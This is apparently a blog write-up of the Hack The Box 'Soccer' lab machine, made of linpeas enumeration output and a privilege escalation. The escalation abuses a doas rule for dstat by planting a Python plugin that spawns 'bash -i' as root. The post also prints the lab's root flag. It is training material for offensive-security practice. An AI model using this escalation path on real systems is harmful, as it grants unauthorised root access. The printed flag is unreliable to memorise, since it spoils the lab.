-rw-r--r-- 1 root root 357 Nov 17 08:07 /usr/lib/node_modules/pm2/.travis.yml
-rw-r--r-- 1 root root 216 Nov 17 08:07 /usr/lib/node_modules/pm2/.mocharc.js
-rw-r--r-- 1 landscape landscape 0 Nov 15 21:40 /var/lib/landscape/.cleanup.user
-rw------- 1 root root 0 Nov 15 21:38 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout
-rw-r--r-- 1 player player 220 Feb 25  2020 /home/player/.bash_logout
-rw------- 1 root root 0 Oct 27 04:34 /snap/core20/1695/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25  2020 /snap/core20/1695/etc/skel/.bash_logout

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxrwx 1 www-data www-data 700144 Mar 18 11:45 /tmp/exploit                                                                                                                 
-rwxrwxr-x 1 player player 765818 Mar 18 10:45 /tmp/linpeas.sh
-rw-rw-r-- 1 player player 166722 Mar 19 04:01 /tmp/peas_result
-rw-rw-rw- 1 www-data www-data 2590720 Mar 18 11:44 /tmp/dist.tar
-rw-r--r-- 1 www-data www-data 1329 Mar 18 11:42 /tmp/CVE-2022-0185/util.c
-rw-r--r-- 1 www-data www-data 7671 Mar 18 11:42 /tmp/CVE-2022-0185/exploit_fuse.c
-rw-r--r-- 1 www-data www-data 17624 Mar 18 11:42 /tmp/CVE-2022-0185/exploit_kctf.c
-rw-r--r-- 1 www-data www-data 1375 Mar 18 11:42 /tmp/CVE-2022-0185/util.h
-rw-r--r-- 1 www-data www-data 1648 Mar 18 11:42 /tmp/CVE-2022-0185/fakefuse.c
-rw-r--r-- 1 www-data www-data 67802 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_lowlevel.h
-rw-r--r-- 1 www-data www-data 18939 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_kernel.h
-rw-r--r-- 1 www-data www-data 45131 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse.h
-rw-r--r-- 1 www-data www-data 27245 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_common.h
-rw-r--r-- 1 www-data www-data 1968 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_log.h
-rw-r--r-- 1 www-data www-data 7549 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/fuse_opt.h
-rw-r--r-- 1 www-data www-data 178 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/meson.build
-rw-r--r-- 1 www-data www-data 2573 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse/cuse_lowlevel.h
-rw-r--r-- 1 www-data www-data 623 Mar 18 11:42 /tmp/CVE-2022-0185/fakefuse.h
-rw-r--r-- 1 www-data www-data 228 Mar 18 11:42 /tmp/CVE-2022-0185/Makefile
-rw-r--r-- 1 www-data www-data 1798260 Mar 18 11:42 /tmp/CVE-2022-0185/libfuse3.a
-rw-r--r-- 1 www-data www-data 73 Mar 18 11:42 /tmp/CVE-2022-0185/.git/description
-rw-r--r-- 1 www-data www-data 23 Mar 18 11:42 /tmp/CVE-2022-0185/.git/HEAD
-rw-r--r-- 1 www-data www-data 1482 Mar 18 11:42 /tmp/CVE-2022-0185/.git/index
-rw-r--r-- 1 www-data www-data 114 Mar 18 11:42 /tmp/CVE-2022-0185/.git/packed-refs
-rw-r--r-- 1 www-data www-data 279 Mar 18 11:42 /tmp/CVE-2022-0185/.git/config
-r--r--r-- 1 www-data www-data 510232 Mar 18 11:42 /tmp/CVE-2022-0185/.git/objects/pack/pack-0dab61f937873259ecf5d2eb543ff85605da5af1.pack
-r--r--r-- 1 www-data www-data 1716 Mar 18 11:42 /tmp/CVE-2022-0185/.git/objects/pack/pack-0dab61f937873259ecf5d2eb543ff85605da5af1.idx
-rw-r--r-- 1 www-data www-data 240 Mar 18 11:42 /tmp/CVE-2022-0185/.git/info/exclude
-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/HEAD
-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/refs/heads/master
-rw-r--r-- 1 www-data www-data 198 Mar 18 11:42 /tmp/CVE-2022-0185/.git/logs/refs/remotes/origin/HEAD
-rwxr-xr-x 1 www-data www-data 896 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/commit-msg.sample
-rwxr-xr-x 1 www-data www-data 4898 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-rebase.sample
-rwxr-xr-x 1 www-data www-data 1492 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/prepare-commit-msg.sample
-rwxr-xr-x 1 www-data www-data 416 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-merge-commit.sample
-rwxr-xr-x 1 www-data www-data 544 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-receive.sample
-rwxr-xr-x 1 www-data www-data 4726 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/fsmonitor-watchman.sample
-rwxr-xr-x 1 www-data www-data 2783 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/push-to-checkout.sample
-rwxr-xr-x 1 www-data www-data 189 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/post-update.sample
-rwxr-xr-x 1 www-data www-data 424 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-applypatch.sample
-rwxr-xr-x 1 www-data www-data 1643 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-commit.sample
-rwxr-xr-x 1 www-data www-data 478 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/applypatch-msg.sample
-rwxr-xr-x 1 www-data www-data 1374 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/pre-push.sample
-rwxr-xr-x 1 www-data www-data 3650 Mar 18 11:42 /tmp/CVE-2022-0185/.git/hooks/update.sample
-rw-r--r-- 1 www-data www-data 41 Mar 18 11:42 /tmp/CVE-2022-0185/.git/refs/heads/master
-rw-r--r-- 1 www-data www-data 32 Mar 18 11:42 /tmp/CVE-2022-0185/.git/refs/remotes/origin/HEAD
-rw-r--r-- 1 www-data www-data 1241 Mar 18 11:42 /tmp/CVE-2022-0185/README.md
-rw-r--r-- 1 root root 4085 Dec  1 19:02 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 172 Nov 17 08:51 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 682236 Dec 13 07:46 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 268 Nov 15 21:42 /var/backups/dpkg.diversions.0
-rw-r--r-- 1 root root 4039 Dec  1 13:33 /var/backups/apt.extended_states.2.gz
-rw-r--r-- 1 root root 36981 Dec 13 07:46 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 61440 Mar 19 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 4062 Nov 22 16:36 /var/backups/apt.extended_states.3.gz

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                               
/dev/mqueue                                                                                                                                                                     
/dev/shm
/home/player
/run/lock
/run/screen
/run/user/1001
/run/user/1001/dbus-1
/run/user/1001/dbus-1/services
/run/user/1001/gnupg
/run/user/1001/inaccessible
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/user/1001/systemd/units
/snap/core20/1695/run/lock
/snap/core20/1695/tmp
/snap/core20/1695/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory

/var/crash
/var/lib/php/sessions
/var/tmp
/var/tmp/cloud-init
/var/www/html/tiny/uploads

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                               
  Group player:                                                                                                                                                                 
/usr/local/share/dstat                                                                                                                                                          
/tmp/linpeas.sh
/tmp/peas_result

╔══════════╣ Searching passwords in history files
                                                                                                                                                                                
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password                                                                                                                                                      
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/component_validate_password.so
/usr/lib/mysql/plugin/validate_password.so
/usr/lib/node_modules/pm2/node_modules/enquirer/lib/prompts/password.js
/usr/lib/node_modules/pm2/node_modules/proxy-agent/test/ssl-cert-snakeoil.key
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder

/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/man/man7/gitcredentials.7.gz

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                                                                
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/54adfd95645d49d9a102f16e9e98293b/user-1001.journal matches                                                                                         
[    4.757765] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[    5.271285] systemd[1]: Started Forward Password Requests to Wall Directory Watch.



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                                                                                              
                                ╚════════════════╝                                                                                                                              
Regexes to search for API keys aren't activated, use param '-r' 


player@soccer:~$ 

https://app.hackthebox.com/machines/Soccer_第23张图片

we try this doas

player@soccer:~$ 
player@soccer:~$ 
player@soccer:~$ find / -name "doas.conf"
find: ‘/run/udisks2’: Permission denied
find: ‘/run/user/1001/inaccessible’: Permission denied
find: ‘/run/sudo’: Permission denied
find: ‘/run/cryptsetup’: Permission denied
find: ‘/run/multipath’: Permission denied
find: ‘/run/lvm’: Permission denied
find: ‘/run/systemd/unit-root’: Permission denied
find: ‘/run/systemd/inaccessible’: Permission denied
find: ‘/run/lock/lvm’: Permission denied
find: ‘/run/initramfs’: Permission denied
/usr/local/etc/doas.conf
find: ‘/sys/kernel/tracing’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
find: ‘/sys/fs/pstore’: Permission denied
find: ‘/sys/fs/bpf’: Permission denied
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
find: ‘/var/spool/cron/atspool’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/var/lib/update-notifier/package-data-downloads/partial’: Permission denied
find: ‘/var/lib/snapd/void’: Permission denied
find: ‘/var/lib/snapd/cookie’: Permission denied
find: ‘/var/lib/polkit-1’: Permission denied
find: ‘/var/lib/apt/lists/partial’: Permission denied
find: ‘/var/lib/php/sessions’: Permission denied
find: ‘/var/lib/mysql’: Permission denied
find: ‘/var/lib/private’: Permission denied
find: ‘/var/lib/AccountsService/users’: Permission denied
find: ‘/var/lib/nginx/proxy’: Permission denied
find: ‘/var/lib/nginx/scgi’: Permission denied
find: ‘/var/lib/nginx/fastcgi’: Permission denied
find: ‘/var/lib/nginx/uwsgi’: Permission denied
find: ‘/var/lib/nginx/body’: Permission denied
find: ‘/var/lib/mysql-files’: Permission denied
find: ‘/var/lib/udisks2’: Permission denied
find: ‘/var/lib/mysql-keyring’: Permission denied
find: ‘/var/cache/ldconfig’: Permission denied
find: ‘/var/cache/apt/archives/partial’: Permission denied
find: ‘/var/cache/pollinate’: Permission denied
find: ‘/var/cache/private’: Permission denied
find: ‘/var/cache/apparmor/f4764548.0’: Permission denied
find: ‘/var/cache/apparmor/26b63962.0’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-ModemManager.service-2Jc3Qh’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-resolved.service-AZNBGh’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-logind.service-gQS10e’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-fwupd.service-brjMyf’: Permission denied
find: ‘/var/log/mysql’: Permission denied
find: ‘/var/log/private’: Permission denied
find: ‘/var/log/audit’: Permission denied
find: ‘/var/snap/lxd/common/lxd’: Permission denied
find: ‘/etc/multipath’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied
find: ‘/etc/audisp’: Permission denied
find: ‘/etc/sudoers.d’: Permission denied
find: ‘/etc/audit’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-logind.service-pA8l0f’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-fwupd.service-2klkjg’: Permission denied
find: ‘/tmp/vmware-root_667-3980363901’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-resolved.service-ltRDmi’: Permission denied
find: ‘/tmp/snap-private-tmp’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-ModemManager.service-IA1Phh’: Permission denied
find: ‘/proc/tty/driver’: Permission denied
find: ‘/lost+found’: Permission denied
find: ‘/root’: Permission denied
find: ‘/snap/core20/1695/etc/ssl/private’: Permission denied
find: ‘/snap/core20/1695/root’: Permission denied
find: ‘/snap/core20/1695/var/cache/ldconfig’: Permission denied
find: ‘/snap/core20/1695/var/cache/private’: Permission denied
find: ‘/snap/core20/1695/var/lib/private’: Permission denied
find: ‘/snap/core20/1695/var/lib/snapd/void’: Permission denied
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
player@soccer:~$ dstat -h
Usage: dstat [-afv] [options..] [delay [count]]
Versatile tool for generating system resource statistics)

Dstat options:
  -c, --cpu                enable cpu stats
     -C 0,3,total             include cpu0, cpu3 and total
  -d, --disk               enable disk stats
     -D total,hda             include hda and total
  -g, --page               enable page stats
  -i, --int                enable interrupt stats
     -I 5,eth2                include int5 and interrupt used by eth2
  -l, --load               enable load stats
  -m, --mem                enable memory stats
  -n, --net                enable network stats
     -N eth1,total            include eth1 and total
  -p, --proc               enable process stats
  -r, --io                 enable io stats (I/O requests completed)
  -s, --swap               enable swap stats
     -S swap1,total           include swap1 and total
  -t, --time               enable time/date output
  -T, --epoch              enable time counter (seconds since epoch)
  -y, --sys                enable system stats

  --aio                    enable aio stats
  --fs, --filesystem       enable fs stats
  --ipc                    enable ipc stats
  --lock                   enable lock stats
  --raw                    enable raw stats
  --socket                 enable socket stats
  --tcp                    enable tcp stats
  --udp                    enable udp stats
  --unix                   enable unix stats
  --vm                     enable vm stats
  --vm-adv                 enable advanced vm stats
  --zones                  enable zoneinfo stats

  --list                   list all available plugins
  --<plugin-name>          enable external plugin by name (see --list)

  -a, --all                equals -cdngy (default)
  -f, --full               automatically expand -C, -D, -I, -N and -S lists
  -v, --vmstat             equals -pmgdsc -D total

  --bits                   force bits for values expressed in bytes
  --float                  force float values on screen
  --integer                force integer values on screen

  --bw, --black-on-white   change colors for white background terminal
  --color                  force colors
  --nocolor                disable colors
  --noheaders              disable repetitive headers
  --noupdate               disable intermediate updates
  --output file            write CSV output to file
  --profile                show profiling statistics when exiting dstat

delay is the delay in seconds between each update (default: 1)
count is the number of updates to display before exiting (default: unlimited)

player@soccer:~$ dstat 3 10
--total-cpu-usage-- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai stl| read  writ| recv  send|  in   out | int   csw 
  1   0  99   0   0| 234M  224M|   0     0 |   0     0 |6373k   12M
  0   0  99   0   0|   0     0 | 178B  538B|   0     0 | 253   483 
  0   0 100   0   0|   0     0 | 103B  331B|   0     0 | 252   491 ^C
player@soccer:~$ cd /usr/local/share/dstat/
player@soccer:/usr/local/share/dstat$ ls
player@soccer:/usr/local/share/dstat$ echo "import os"
import os
player@soccer:/usr/local/share/dstat$  
player@soccer:/usr/local/share/dstat$ os.system('bash -i')
-bash: syntax error near unexpected token `'bash -i''
player@soccer:/usr/local/share/dstat$ 
player@soccer:/usr/local/share/dstat$ vim dstat_pe.pyt
player@soccer:/usr/local/share/dstat$ vim dstat_pe.py
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat pe
You did not select any stats, using -cdngy by default.
dstat: incorrect argument, try dstat -h for the correct syntax
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --pe
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
root@soccer:/usr/local/share/dstat# 
root@soccer:/usr/local/share/dstat# id
uid=0(root) gid=0(root) groups=0(root)
root@soccer:/usr/local/share/dstat# pwd
/usr/local/share/dstat
root@soccer:/usr/local/share/dstat# cd /root
root@soccer:~# ls
app  root.txt  run.sql  snap
root@soccer:~# cat root.txt 
01fd0d3dafe0d3b083a6c69f84154f06
root@soccer:~# cat run.sql 
delete from soccer_db.accounts where id != 1324;
root@soccer:~# 

https://app.hackthebox.com/machines/Soccer_第24张图片

So we get the flag!

try suid

uid=33(www-data) gid=33(www-data) groups=33(www-data)
find / -user root -perm -4000 -print 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign



this is another try

你可能感兴趣的:(hack,the,box,笔记,web,linux,ubuntu,服务器,web安全,htb)